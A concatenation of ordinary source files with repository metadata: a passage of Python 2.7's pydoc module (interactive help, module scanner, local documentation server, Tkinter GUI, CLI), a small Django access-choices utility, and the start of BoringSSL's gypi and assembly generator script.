'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
# Fold _symbols_inverse into symbols at class-definition time, appending
# each topic to any topic list the symbol already has.  (Python 2
# dict.iteritems; runs once when the class body executes.)
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
# input/output may be None: the properties below then fall back to the
# interpreter's current stdin/stdout.
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
# Typing bare `help` at the prompt (stack frame '?') starts a session.
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
# Sentinel distinguishing help() (interactive) from help(obj).
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
# Main read-eval loop of the "help>" prompt; quits on EOF, Ctrl-C,
# empty input, or the q/quit commands.
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
# Dispatch a single request string (or object) to the right handler.
# Order matters: listing commands first, then symbol/keyword/topic
# tables, then plain documentation lookup.
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
# Print `items` sorted, flowing down columns.  NOTE: relies on
# Python 2 integer division for colw/rows.
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
# Resolve topic aliases (string entries) recursively, then page the
# documentation stored in pydoc_data.topics, followed by cross-refs.
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
# A symbol entry is "topic xref xref..."; first word is the topic.
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
# Collapse package __init__ modules and keep only top-level names.
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
# Module-level singleton; the interpreter's built-in help() delegates here.
help = Helper()
class Scanner:
    """A generic tree iterator."""

    def __init__(self, roots, children, descendp):
        # Copy the roots so the caller's list is never consumed.
        self.roots = roots[:]
        self.state = []            # stack of (node, pending-children) pairs
        self.children = children   # node -> list of that node's children
        self.descendp = descendp   # node -> whether to descend into it

    def next(self):
        """Return the next child node in the traversal, or None at the end."""
        if not self.state:
            # Current tree exhausted: start on the next root, if any.
            if not self.roots:
                return None
            root = self.roots.pop(0)
            self.state = [(root, self.children(root))]
        node, pending = self.state[-1]
        if not pending:
            # This level is finished; drop it and resume one level up.
            self.state.pop()
            return self.next()
        child = pending.pop(0)
        if self.descendp(child):
            self.state.append((child, self.children(child)))
        return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
# Set self.quit = True from another thread to stop a running scan.
def run(self, callback, key=None, completer=None, onerror=None):
# callback(path, modname, desc) is invoked for every (matching) module;
# when `key` is given, only modules whose "name - synopsis" line
# contains it (case-insensitively) are reported.
if key: key = lower(key)
self.quit = False
seen = {}
# Built-in modules first; they have no file path.
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
# Then everything reachable on sys.path via pkgutil.
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
# Read the synopsis from source without importing the module.
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
# No source available: fall back to importing the module.
module = loader.load_module(modname)
desc = module.__doc__.splitlines()[0] if module.__doc__ else ''
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
# Present package __init__ modules under their package name.
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
# Ignore modules that fail to import during the scan.
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
# Serve HTML documentation over HTTP on localhost:port until interrupted.
# callback(server) runs once the server is ready; completer() runs on exit.
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
# Best-effort write of one HTML page; client disconnects ignored.
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
# URL scheme: "/<dotted.name>.html" documents an object;
# "/" serves the index of all modules.
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
# Poll with a 1s timeout so self.quit is honoured promptly.
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
# server_port reflects the real port when port 0 was requested.
self.url = 'http://%s:%d/' % (self.address[0], self.server_port)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
# Top row: server status plus open/quit buttons (enabled once the
# background server reports ready).
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
# Second row: search entry plus stop button.
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
# Results list (shown only while expanded; see expand()/collapse()).
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
# Run the HTTP server on a background thread; ready()/quit() are
# invoked from it as the server starts and stops.
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
# Kick off (or restart) a background ModuleScanner keyed on the
# entry text; results stream in via update().
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
def onerror(modname):
pass
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done),
kwargs=dict(onerror=onerror)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
# Open the selected module's page in the browser.
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
    """Return True when x is a string containing the platform path separator."""
    return isinstance(x, str) and os.sep in x
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
# Marker exception used to fall through to the usage message below.
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
# -g, -k and -p each fully handle the invocation and return;
# -w just toggles the mode used for the positional arguments.
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
# Arguments containing os.sep are treated as file paths.
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
# Script entry point: dispatch on command-line arguments.
if __name__ == '__main__': cli()
|
{
"content_hash": "450090b4923653b46ccf7cd000e4176c",
"timestamp": "",
"source": "github",
"line_count": 2408,
"max_line_length": 95,
"avg_line_length": 40.683970099667775,
"alnum_prop": 0.5232578317188441,
"repo_name": "kubaszostak/gdal-dragndrop",
"id": "b62971908a6d6edd5886ec36af7b6540893da364",
"size": "98017",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "osgeo/apps/Python27/Lib/pydoc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "13000"
},
{
"name": "C",
"bytes": "5038286"
},
{
"name": "C#",
"bytes": "14671"
},
{
"name": "C++",
"bytes": "2529439"
},
{
"name": "CMake",
"bytes": "90844"
},
{
"name": "Fortran",
"bytes": "8281"
},
{
"name": "HTML",
"bytes": "1285524"
},
{
"name": "Objective-C",
"bytes": "45668"
},
{
"name": "Python",
"bytes": "16415309"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
# Third-party dependency: django-model-utils.
from model_utils import Choices
__author__ = "pmeier82"
# Access levels ("private"/"public"); Choices makes the tuple usable as a
# Django field `choices` argument — presumably consumed by the models in
# this package (TODO confirm against callers).
AccessChoices = Choices("private", "public")
if __name__ == "__main__":
pass
|
{
"content_hash": "d76020f0a2bc75ec6f0f6f115936b423",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 44,
"avg_line_length": 20,
"alnum_prop": 0.6611111111111111,
"repo_name": "pmeier82/django-spikeval",
"id": "103e22aa87a1ccfa3fb5a4e2eb4136ffdd7ef3bc",
"size": "205",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "djspikeval/models/util.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "259"
},
{
"name": "HTML",
"bytes": "44877"
},
{
"name": "Python",
"bytes": "81993"
}
],
"symlink_target": ""
}
|
"""Enumerates the BoringSSL source in src/ and generates two gypi files:
boringssl.gypi and boringssl_tests.gypi."""
import os
import subprocess
import sys
# OS_ARCH_COMBOS maps from OS and platform to the OpenSSL assembly "style" for
# that platform and the extension used by asm files.
# Tuple layout: (os, arch, perlasm_style, extra perlasm args, asm extension).
OS_ARCH_COMBOS = [
('linux', 'arm', 'elf', [''], 'S'),
('linux', 'aarch64', 'linux64', [''], 'S'),
('linux', 'x86', 'elf', ['-fPIC'], 'S'),
('linux', 'x86_64', 'elf', [''], 'S'),
('mac', 'x86', 'macosx', ['-fPIC'], 'S'),
('mac', 'x86_64', 'macosx', [''], 'S'),
('win', 'x86', 'win32n', [''], 'asm'),
('win', 'x86_64', 'nasm', [''], 'asm'),
]
# NON_PERL_FILES enumerates assembly files that are not processed by the
# perlasm system.
# Keyed by (os, arch); merged into WriteAsmFiles' output as-is.
NON_PERL_FILES = {
('linux', 'arm'): [
'src/crypto/poly1305/poly1305_arm_asm.S',
'src/crypto/chacha/chacha_vec_arm.S',
'src/crypto/cpu-arm-asm.S',
],
}
# Boilerplate emitted at the top of every generated .gypi file.
FILE_HEADER = """# Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This file is created by update_gypi_and_asm.py. Do not edit manually.
"""
def FindCMakeFiles(directory):
    """Returns list of all CMakeLists.txt files recursively in directory."""
    found = []
    for (path, _, filenames) in os.walk(directory):
        found.extend(
            os.path.join(path, name)
            for name in filenames
            if name == 'CMakeLists.txt')
    return found
def NoTests(dent, is_dir):
    """Filter function that can be passed to FindCFiles in order to remove test
    sources."""
    if is_dir:
        # Prune test/ subdirectories entirely.
        return dent != 'test'
    # Reject foo_test.c-style sources and the example_* programs.
    is_test_source = ('test.' in dent) or dent.startswith('example_')
    return not is_test_source
def OnlyTests(dent, is_dir):
    """Filter function that can be passed to FindCFiles in order to remove
    non-test sources."""
    if is_dir:
        # Descend into every directory; filtering happens on file names.
        return True
    return dent.startswith('example_') or '_test.' in dent
def FindCFiles(directory, filter_func):
    """Recurses through directory and returns a list of paths to all the C source
    files that pass filter_func.

    filter_func(name, is_dir) decides both which .c files are collected and
    which subdirectories os.walk is allowed to descend into.
    """
    cfiles = []
    for (path, dirnames, filenames) in os.walk(directory):
        for filename in filenames:
            if filename.endswith('.c') and filter_func(filename, False):
                cfiles.append(os.path.join(path, filename))
        # Prune rejected directories with an in-place slice assignment so
        # os.walk skips them.  The previous `del dirnames[i]` inside an
        # enumerate() loop skipped the element following each deletion, so
        # consecutive rejected directories were not all pruned.
        dirnames[:] = [d for d in dirnames if filter_func(d, True)]
    return cfiles
def ExtractPerlAsmFromCMakeFile(cmakefile):
    """Parses the contents of the CMakeLists.txt file passed as an argument and
    returns a list of all the perlasm() directives found in the file."""
    directives = []
    base = os.path.dirname(cmakefile)
    with open(cmakefile) as f:
        for raw in f:
            line = raw.strip()
            if not line.startswith('perlasm('):
                continue
            if not line.endswith(')'):
                raise ValueError('Bad perlasm line in %s' % cmakefile)
            # Strip "perlasm(" from the start and ")" from the end, then
            # split the whitespace-separated arguments: output, input, flags.
            params = line[8:-1].split()
            if len(params) < 2:
                raise ValueError('Bad perlasm line in %s' % cmakefile)
            directives.append({
                'extra_args': params[2:],
                'input': os.path.join(base, params[1]),
                'output': os.path.join(base, params[0]),
            })
    return directives
def ReadPerlAsmOperations():
    """Returns a list of all perlasm() directives found in CMake config files in
    src/."""
    ops = []
    for cmakefile in FindCMakeFiles('src'):
